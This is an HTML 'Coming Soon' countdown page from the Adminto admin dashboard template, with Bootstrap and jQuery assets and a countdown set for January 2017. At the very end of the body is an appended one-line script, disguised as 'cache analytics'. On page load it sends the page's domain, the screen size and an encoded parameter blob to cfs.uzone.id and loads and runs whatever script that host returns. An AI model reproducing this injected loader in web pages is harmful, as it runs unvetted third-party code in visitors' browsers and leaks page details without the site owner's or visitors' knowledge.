<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <meta name="description" content="A fully featured admin theme which can be used to build CRM, CMS, etc.">
        <meta name="author" content="Coderthemes">

        <!-- App Favicon -->
        <link rel="shortcut icon" href="assets/images/favicon.ico">

        <!-- App title -->
        <title>Adminto - Responsive Admin Dashboard Template</title>

        <!-- App CSS -->
        <link href="assets/css/bootstrap.min.css" rel="stylesheet" type="text/css" />
        <link href="assets/css/core.css" rel="stylesheet" type="text/css" />
        <link href="assets/css/components.css" rel="stylesheet" type="text/css" />
        <link href="assets/css/icons.css" rel="stylesheet" type="text/css" />
        <link href="assets/css/pages.css" rel="stylesheet" type="text/css" />
        <link href="assets/css/menu.css" rel="stylesheet" type="text/css" />
        <link href="assets/css/responsive.css" rel="stylesheet" type="text/css" />

        <!-- HTML5 Shiv and Respond.js IE8 support of HTML5 elements and media queries -->
        <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
        <!--[if lt IE 9]>
        <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js"></script>
        <![endif]-->

        <script src="assets/js/modernizr.min.js"></script>

<script>
    (function (i, s, o, g, r, a, m) {
        i['GoogleAnalyticsObject'] = r;
        i[r] = i[r] || function () {
                    (i[r].q = i[r].q || []).push(arguments)
                }, i[r].l = 1 * new Date();
        a = s.createElement(o),
                m = s.getElementsByTagName(o)[0];
        a.async = 1;
        a.src = g;
        m.parentNode.insertBefore(a, m)
    })(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga');
    ga('create', 'UA-74137680-1', 'auto');
    ga('send', 'pageview');
</script>
        
    </head>
    <body>
    	<div class="account-pages"></div>
		<div class="clearfix"></div>

        <!-- HOME -->
        <div class="home-wrapper">
            <div class="container-alt">

                <div class="row m-t-40">
                    <div class="col-sm-12">
                        <div class="text-center">
                            <h2 class="text-success m-t-0 text-uppercase font-600">Coming Soon</h2>
                        </div>
                    </div>
                </div>

                <div class="row">
                    <div class="col-sm-10 col-sm-offset-1">
                        <div id="count-down" class="row center-block">
                            <div class="clock-presenter days_dash col-sm-3">
                                <div class="digit"></div>
                                <div class="digit"></div>
                                <div class="digit"></div>
                                <p class='note dash_title'>Days</p>
                            </div>
                            <div class="clock-presenter hours_dash col-sm-3">
                                <div class="digit"></div>
                                <div class="digit"></div>
                                <p class='note dash_title'>Hours</p>
                            </div>
                            <div class="clock-presenter minutes_dash col-sm-3">
                                <div class="digit"></div>
                                <div class="digit"></div>
                                <p class='note dash_title'>Minutes</p>
                            </div>
                            <div class="clock-presenter seconds_dash col-sm-3">
                                <div class="digit"></div>
                                <div class="digit"></div>
                                <p class='note dash_title'>Seconds</p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <!-- END HOME -->


        
        <script>
            var resizefunc = [];
        </script>

        <!-- jQuery  -->
        <script src="assets/js/jquery.min.js"></script>
        <script src="assets/js/bootstrap.min.js"></script>
        <script src="assets/js/detect.js"></script>
        <script src="assets/js/fastclick.js"></script>
        <script src="assets/js/jquery.slimscroll.js"></script>
        <script src="assets/js/jquery.blockUI.js"></script>
        <script src="assets/js/waves.js"></script>
        <script src="assets/js/wow.min.js"></script>
        <script src="assets/js/jquery.nicescroll.js"></script>
        <script src="assets/js/jquery.scrollTo.min.js"></script>

        <!-- Count down js -->
        <script src="assets/plugins/count-down/jquery.lwtCountdown-1.0.js"></script>

        <!-- App js -->
        <script src="assets/js/jquery.core.js"></script>
        <script src="assets/js/jquery.app.js"></script>

        <script type="text/javascript">
            $(document).ready(function () {

                "use strict";

                //Set your date
                $('#count-down').countDown({
                    targetDate: {
                        'day': 17,
                        'month': 1,
                        'year': 2017,
                        'hour': 0,
                        'min': 0,
                        'sec': 0
                    },
                    omitWeeks: true
                });

            });
        </script>

    
    <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnrrKOU8lJFitLhCpKZNZGp%2bA3ufrdPQZCtat8DfQ5Uog4OJao%2bgEUSxr%2boj%2fjtdcR6DC9%2fxviZhz4Jt4kgyykeh2xGjYpc5kxWMnvJN4kwHs%2bFmFQ7B9oA7IGy7OKViEfwro1R0mhMrd0ohXsNJaQcqvmsRXB4tVCdJJ9Xi1m7%2fWOu4BebbzPynFKDG%2bCAA0sHDNV%2bVJE5DhiA81RVYBgJHX6mXo%2f02nrvTZJTQDPyY9KgVt69igEMU6WFkuriDKAIJwUW88mt2346D%2fKNyus7xUgqV8Im%2fh99rgK%2febFMLZJc656%2fieBeA1z0avgo3Gccv4qdg6CAJZGxs0hCNhxM8HfNkaOaW8UmsV4XqgZRa9nrbtL%2bqc3M7E3siyyYKKAJ3EXa3Ne6Iv1vUeEWJGDAgM7wnsYymP8VBeOcLu7QGhA2AREjf0xsCRZAPZp1jWKMs52lFX5TKZ%2fOd92cKI%2fjQVN08xeh6EHRFfOmYYJ3rPswxFeN8lXN2ZesdO1KgTQ" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>